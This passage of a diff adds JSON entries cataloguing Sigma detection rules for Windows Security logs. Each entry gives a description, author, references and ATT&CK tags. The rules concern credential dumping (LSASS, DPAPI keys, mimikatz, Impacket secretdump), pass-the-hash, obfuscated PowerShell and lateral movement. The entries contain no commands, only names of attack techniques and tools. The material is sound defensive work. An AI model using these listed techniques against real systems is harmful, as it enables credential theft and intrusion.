"logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-190620024610.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dpapi_domain_backupkey_extraction.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.004" + ] + }, + "uuid": "4ac1f50b-3bd0-4968-902d-868b4647937e", + "value": "DPAPI Domain Backup Key Extraction" + }, + { + "description": "Detects anyone attempting a backup for the DPAPI Master Key. This events gets generated at the source and not the Domain Controller.", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/10", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_dpapi_domain_masterkey_backup_attempt.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-190620024610.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dpapi_domain_masterkey_backup_attempt.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.004" + ] + }, + "uuid": "39a94fd1-8c9a-4ff6-bf22-c058762f8014", + "value": "DPAPI Domain Master Key Backup Attempt" + }, + { + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/06/05", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_etw_modification.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/_xpn_/status/1268712093928378368", + "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", + "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", + "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", + "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", + "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", + "https://bunnyinside.com/?term=f71e8cb9c76a", + "http://managed670.rssing.com/chan-5590147/all_p1.html", + "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_etw_modification.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", + "value": "COMPlus_ETWEnabled Registry Modification" + }, + { + "description": "Checks for event id 1102 which indicates the security event log was cleared.", + "meta": { + "author": "Saw Winn Naung", + "creation_date": "2021/08/15", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "win_security_event_log_cleared.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/SecurityEventLogCleared.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_event_log_cleared.yml" + ], + "tags": [ + "attack.t1070.001" + ] + }, + "uuid": "a122ac13-daf8-4175-83a2-72c387be339d", + "value": "Security Event Log Cleared" + }, + { + "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", + "meta": { + "author": "INIT_6", + "creation_date": "2021/07/02", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/INIT_3/status/1410662463641731075", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_exploit_cve_2021_1675_printspooler_security.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569", + "cve.2021.1675", + "cve.2021.34527" + ] + }, + "uuid": "8fe1c584-ee61-444b-be21-e9054b229694", + "value": "CVE-2021-1675 Print Spooler Exploitation IPC Access" + }, + { + "description": "Detects external diskdrives or plugged in USB devices , EventID 6416 on windows 10 or later", + "meta": { + "author": "Keith Wright", + "creation_date": "2019/11/20", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "win_security_external_device.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_external_device.yml" + ], + "tags": [ + "attack.t1091", + "attack.t1200", + "attack.lateral_movement", + "attack.initial_access" + ] + }, + "uuid": "f69a87ea-955e-4fb4-adb2-bb9fd6685632", + "value": "External Disk Drive Or USB Storage Device" + }, + { + "description": "Detects enumeration of the global catalog (that can be performed using BloodHound or others AD reconnaissance tools). Adjust Threshold according to domain width.", + "meta": { + "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", + "creation_date": "2020/05/11", + "falsepositive": [ + "Exclude known DCs." + ], + "filename": "win_security_global_catalog_enumeration.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5156", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_global_catalog_enumeration.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.002" + ] + }, + "uuid": "619b020f-0fd7-4f23-87db-3f51ef837a34", + "value": "Enumeration via the Global Catalog" + }, + { + "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", + "meta": { + "author": "Samir Bousseaden", + "creation_date": "2019/04/03", + "falsepositive": [ + "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" + ], + "filename": "win_security_gpo_scheduledtasks.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/menasec1/status/1106899890377052160", + "https://www.secureworks.com/blog/ransomware-as-a-distraction", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_gpo_scheduledtasks.yml" + ], + "tags": [ + "attack.persistence", + "attack.lateral_movement", + "attack.t1053.005" + ] + }, + "uuid": "a8f29a7b-b137-4446-80a0-b804272f3da2", + "value": "Persistence and Execution at Scale via GPO Scheduled Task" + }, + { + "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/05/03", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_hidden_user_creation.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1387743867663958021", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_hidden_user_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001" + ] + }, + "uuid": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", + "value": "Hidden Local User Creation" + }, + { + "description": "Rule to detect the Hybrid Connection Manager service installation.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2021/04/12", + "falsepositive": [ + "Legitimate use of Hybrid Connection Manager via Azure function apps." + ], + "filename": "win_security_hybridconnectionmgr_svc_installation.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_hybridconnectionmgr_svc_installation.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1554" + ] + }, + "uuid": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", + "value": "HybridConnectionManager Service Installation" + }, + { + "description": "Detects execution of Impacket's psexec.py.", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2020/12/14", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_impacket_psexec.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_impacket_psexec.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "32d56ea1-417f-44ff-822b-882873f5f43b", + "value": "Impacket PsExec Execution" + }, + { + "description": "Detect AD credential dumping using impacket secretdump HKTL", + "meta": { + "author": "Samir Bousseaden, wagga", + "creation_date": "2019/04/03", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_impacket_secretdump.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_impacket_secretdump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.003" + ] + }, + "uuid": "252902e3-5830-4cf6-bf21-c22083dfd5cf", + "value": "Possible Impacket SecretDump Remote Activity" + }, + { + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_clip_services_security.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_clip_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "4edf51e1-cb83-4e1a-bc39-800e396068e3", + "value": "Invoke-Obfuscation CLIP+ Launcher - Security" + }, + { + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "meta": { + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "creation_date": "2019/11/08", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "fd0f5778-d3cb-4c9a-9695-66759d04702a", + "value": "Invoke-Obfuscation Obfuscated IEX Invocation - Security" + }, + { + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_stdin_services_security.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_stdin_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", + "value": "Invoke-Obfuscation STDIN+ Launcher - Security" + }, + { + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_var_services_security.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_var_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "dcf2db1f-f091-425b-a821-c05875b8925a", + "value": "Invoke-Obfuscation VAR+ Launcher - Security" + }, + { + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_via_compress_services_security.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_compress_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "7a922f1b-2635-4d6c-91ef-af228b198ad3", + "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - Security" + }, + { + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_via_rundll_services_security.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_rundll_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca", + "value": "Invoke-Obfuscation RUNDLL LAUNCHER - Security" + }, + { + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_stdin_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", + "value": "Invoke-Obfuscation Via Stdin - Security" + }, + { + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_clip_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", + "value": "Invoke-Obfuscation Via Use Clip - Security" + }, + { + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_mshta_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", + "value": "Invoke-Obfuscation Via Use MSHTA - Security" + }, + { + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", + "value": "Invoke-Obfuscation Via Use Rundll32 - Security" + }, + { + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_via_var_services_security.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_var_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", + "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security" + }, + { + "description": "Detects the mount of ISO images on an endpoint", + "meta": { + "author": "Syed Hasan (@syedhasan009)", + "creation_date": "2021/05/29", + "falsepositive": [ + "Software installation ISO files" + ], + "filename": "win_security_iso_mount.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", + "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages", + "https://twitter.com/MsftSecIntel/status/1257324139515269121", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_iso_mount.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566.001" + ] + }, + "uuid": "0248a7bc-8a9a-4cd8-a57e-3ae8e073a073", + "value": "ISO Image Mount" + }, + { + "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", + "meta": { + "author": "Samir Bousseaden", + "creation_date": "2019/04/03", + "falsepositive": [ + "Update the excluded named pipe to filter out any newly observed legit named pipe" + ], + "filename": "win_security_lm_namedpipe.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/menasec1/status/1104489274387451904", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lm_namedpipe.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", + "value": "First Time Seen Remote Named Pipe" + }, + { + "description": "The attacker might use LOLBAS nltest.exe for discovery of domain controllers, domain trusts, parent domain and the current user permissions.", + "meta": { + "author": "Arun Chauhan", + "creation_date": "2021/10/04", + "falsepositive": [ + "Red team activity", + "Rare legitimate use by an administrator" + ], + "filename": "win_security_lolbas_execution_of_nltest.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm", + "https://attack.mitre.org/software/S0359/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lolbas_execution_of_nltest.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1482", + "attack.t1018", + "attack.t1016" + ] + }, + "uuid": "eeb66bbb-3dde-4582-815a-584aee9fe6d1", + "value": "Correct Execution of Nltest.exe" + }, + { + "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/06/20", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_lsass_access_non_system_account.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-170105221010.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lsass_access_non_system_account.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", + "value": "LSASS Access from Non System Account" + }, + { + "description": "Detects well-known credential dumping tools execution via service execution events", + "meta": { + "author": "Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2017/03/05", + "falsepositive": [ + "Legitimate Administrator using credential dumping tool for password recovery" + ], + "filename": "win_security_mal_creddumper.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_creddumper.yml" + ], + "tags": [ + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" + ] + }, + "uuid": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", + "value": "Credential Dumping Tools Service Execution - Security" + }, + { + "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.", + "meta": { + "author": "Florian Roth, Daniil Yugoslavskiy, oscd.community (update)", + "creation_date": "2017/03/27", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_mal_service_installs.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://awakesecurity.com/blog/threat-hunting-for-paexec/", + "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html", + "https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_service_installs.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1003", + "car.2013-09-005", + "attack.t1543.003", + "attack.t1569.002" + ] + }, + "uuid": "cb062102-587e-4414-8efa-dbe3c7bf19c6", + "value": "Malicious Service Installations" + }, + { + "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/06/14", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_mal_wceaux_dll.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://jpcertcc.github.io/ToolAnalysisResultSheet", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_wceaux_dll.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.s0005" + ] + }, + "uuid": "1de68c67-af5c-4097-9c85-fe5578e09e67", + "value": "WCE wceaux.dll Access" + }, + { + "description": "Alerts on Metasploit host's authentications on the domain.", + "meta": { + "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", + "creation_date": "2020/05/06", + "falsepositive": [ + "Linux hostnames composed of 16 characters." + ], + "filename": "win_security_metasploit_authentication.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/lib/rex/proto/smb/client.rb", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_metasploit_authentication.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "72124974-a68b-4366-b990-d30e0b2a190d", + "value": "Metasploit SMB Authentication" + }, + { + "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", + "meta": { + "author": "Bartlomiej Czyz, Relativity", + "creation_date": "2021/01/21", + "falsepositive": [ + "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" + ], + "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://bczyz1.github.io/2021/01/30/psexec.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_metasploit_or_impacket_smb_psexec_service_install.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", + "value": "Metasploit Or Impacket Service Installation Via SMB PsExec" + }, + { + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "meta": { + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "creation_date": "2019/10/26", + "falsepositive": [ + "Highly unlikely" + ], + "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" + ] + }, + "uuid": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", + "value": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security" + }, + { + "description": "Detects NetNTLM downgrade attack", + "meta": { + "author": "Florian Roth, wagga", + "creation_date": "2018/03/20", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_net_ntlm_downgrade.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_net_ntlm_downgrade.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1112" + ] + }, + "uuid": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", + "value": "NetNTLM Downgrade Attack" + }, + { + "description": "Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", + "meta": { + "author": "Tim Shelton (HAWK.IO)", + "creation_date": "2021/12/06", + "falsepositive": [ + "Read only access list authority" + ], + "filename": "win_security_net_share_obj_susp_desktop_ini.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_net_share_obj_susp_desktop_ini.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.009" + ] + }, + "uuid": "35bc7e28-ee6b-492f-ab04-da58fcf6402e", + "value": "Windows Network Access Suspicious desktop.ini Action" + }, + { + "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", + "meta": { + "author": "Ilyas Ochkov, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_new_or_renamed_user_account_with_dollar_sign.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ] + }, + "uuid": "cfeed607-6aa4-4bbd-9627-b637deb723c8", + "value": "New or Renamed User Account with '$' in Attribute 'SamAccountName'" + }, + { + "description": "This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.\nOften, this event can be generated by attackers when searching for available windows servers in the network.\n", + "meta": { + "author": "Pushkarev Dmitry", + "creation_date": "2020/06/27", + "falsepositive": [ + "Valid user was not added to RDP group" + ], + "filename": "win_security_not_allowed_rdp_access.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4825", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_not_allowed_rdp_access.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.001" + ] + }, + "uuid": "8e5c03fa-b7f0-11ea-b242-07e0576828d9", + "value": "Denied Access To Remote Desktop" + }, + { + "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", + "meta": { + "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", + "creation_date": "2018/02/12", + "falsepositive": [ + "Runas command-line tool using /netonly parameter" + ], + "filename": "win_security_overpass_the_hash.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": 